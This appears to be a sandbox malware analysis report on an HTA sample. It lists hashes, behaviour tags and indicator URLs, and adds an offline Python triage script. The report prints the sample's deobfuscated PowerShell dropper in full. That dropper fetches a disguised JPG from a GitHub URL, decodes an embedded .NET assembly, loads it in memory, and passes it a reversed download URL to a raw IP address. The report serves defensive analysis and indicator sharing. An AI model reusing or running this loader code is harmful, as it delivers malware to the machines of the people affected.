General

  • Target: nicetokissthebestthingsiwantotgetmebackwith.hta
  • Size: 130KB
  • Sample: 241017-rcnzwszgkc
  • MD5: b581033fd1ba02c7724802d3ccda9b5b
  • SHA1: ad4484b11cfd436200542cc8e4fbaebcb7491bf8
  • SHA256: 008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4
  • SHA512: 12c49b5ace4caf4ee56726ab8c19ace2e95f5a8c5478edd9f3076dcd3a659f6aa0240fbad95083657512cb22a4d8c5d0f57c1374e1dddc90f7f56389daac8d47
  • SSDEEP: 192:Ea2xiqX85ziqI8o33MAEyNiqIiqaH8niqyCT:UxR85za88MZ0Kw8nX

Malware Config

Extracted

Language: ps1

Deobfuscated:

# powershell snippet 0
invoke-expression "$imageUrl = 'https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.RDCCNM/055/831.922.571.701//:ptth', 'desativado', 'desativado', 'desativado', 'RegAsm', 'desativado', 'desativado'));"

# powershell snippet 1
$imageurl = "https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg "
$webclient = new-object system.net.webclient
$imagebytes = $webclient.downloaddata("https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg ")
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
$startflag = "<<BASE64_START>>"
$endflag = "<<BASE64_END>>"
$startindex = $imagetext.indexof("<<BASE64_START>>")
$endindex = $imagetext.indexof("<<BASE64_END>>")
$startindex -ge 0 -and $endindex -gt $startindex
$startindex = $startflag.length
$base64length = $endindex - $startindex
$base64command = $imagetext.substring($startindex, $base64length)
$commandbytes = [system.convert]::frombase64string($base64command)
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
$vaimethod = ([dnlib.io.home]).getmethod("VAI")
$vaimethod.invoke($null, "txt.RDCCNM/055/831.922.571.701//:ptth", "desativado", "desativado", "desativado", "RegAsm", "desativado", "desativado")

Snippet 1 is the automated normalisation of snippet 0 and diverges from it in three places: it decodes the download as ASCII where snippet 0 uses UTF8, it assigns $startindex = $startflag.length where snippet 0 uses +=, and it passes the VAI arguments individually where snippet 0 wraps them in a single @() array. Where the two differ, snippet 0 is the code that actually ran. In both, the marker check ($startindex -ge 0 -and $endindex -gt $startindex) is a bare expression whose result is emitted rather than acted on, so a missing marker is not handled and the script simply proceeds to the Substring call. The first VAI argument is a reversed string: read backwards it is http://107.175.229.138/550/MNCCDR.txt. "desativado" is Portuguese for "disabled".
URLs

ps1.dropper
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

The trailing %20 is the literal space inside the quoted URL in the script (the string ends in "DetahNote_V.jpg "), so indicator matching should cover the encoded form as well as the bare path.
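As an added example (not part of the tria.ge report and not the malware's own code), the Python below re-implements the stager's marker-delimited extraction offline, applies the two checks the stager does not (markers actually present and ordered, decoded bytes actually a PE image), hashes the recovered payload for pivoting, and reverses the first VAI argument. It runs against a constructed in-memory "image" carrying a PE header stub; the real file at the GitHub URL is not fetched, and the field names in decode_vai_args are the example author's labels for the argument positions, not something the report states.

```python
"""Offline triage of the marker-delimited stager shown in the report.

Added example, not tria.ge code and not the sample's code. All data below is
constructed in memory; nothing is downloaded, and FAKE_PE is a minimal header
stub standing in for the real .NET assembly.
"""
import base64
import hashlib

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def extract_payload(blob: bytes) -> bytes:
    """Return the base64-decoded bytes between the two markers.

    The stager evaluates `$startIndex -ge 0 -and $endIndex -gt $startIndex`
    but never branches on it (a bare expression in PowerShell is just echoed),
    so it carries on to Substring even when a marker is absent. Here the same
    condition actually gates the decode.
    """
    start = blob.find(START_FLAG)
    end = blob.find(END_FLAG)
    if not (start >= 0 and end > start):
        raise ValueError("BASE64 markers missing or misordered")
    start += len(START_FLAG)
    return base64.b64decode(blob[start:end].strip(), validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Assembly.Load needs a PE/CLI image: check the MZ stub and PE\\0\\0 signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_vai_args(args: list) -> dict:
    """Normalise the argument list handed to dnlib.IO.Home.VAI.

    Only the first argument is obfuscated, and only by string reversal. The
    key names are this example's labels (assumption), chosen from the values;
    'desativado' is Portuguese for 'disabled' and is passed through unchanged.
    """
    return {
        "download_url": args[0][::-1],
        "options": args[1:4],
        "loader": args[4],
        "extra": args[5:],
    }


# --- constructed sample: an 'image' file wrapping a PE header stub -----------
FAKE_PE = (
    b"MZ" + b"\x00" * 58            # DOS header, e_lfanew lives at offset 0x3C
    + (0x40).to_bytes(4, "little")  # e_lfanew -> 0x40
    + b"PE\x00\x00"                 # PE signature
    + b"\x00" * 24                  # padding standing in for the rest of the image
)
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0 JPEG-looking junk "
    + START_FLAG + base64.b64encode(FAKE_PE) + END_FLAG
    + b" trailing junk"
)

# The argument list exactly as it appears in snippet 0 of the report.
VAI_ARGS = [
    "txt.RDCCNM/055/831.922.571.701//:ptth",
    "desativado", "desativado", "desativado",
    "RegAsm",
    "desativado", "desativado",
]


def triage(image: bytes = FAKE_IMAGE, args: list = VAI_ARGS) -> dict:
    """Pull out the embedded assembly and report what a loader would see."""
    payload = extract_payload(image)
    return {
        "payload_sha256": hashlib.sha256(payload).hexdigest(),
        "payload_is_pe": looks_like_pe(payload),
        **decode_vai_args(args),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Run it as-is to see the reversed first argument come out as http://107.175.229.138/550/MNCCDR.txt, the only network indicator in the argument list; to use it on a real capture, pass the downloaded file's bytes to triage() in place of FAKE_IMAGE and check payload_is_pe before handing the SHA256 to any further tooling.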

Targets

    • Target: nicetokissthebestthingsiwantotgetmebackwith.hta

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden.

    • Evasion via Device Credential Deployment

    • Checks computer location settings

      Looks up the country code configured in the registry, likely used as a geofence.

    • Legitimate hosting services abused for malware hosting/C2
MITRE ATT&CK Enterprise v15
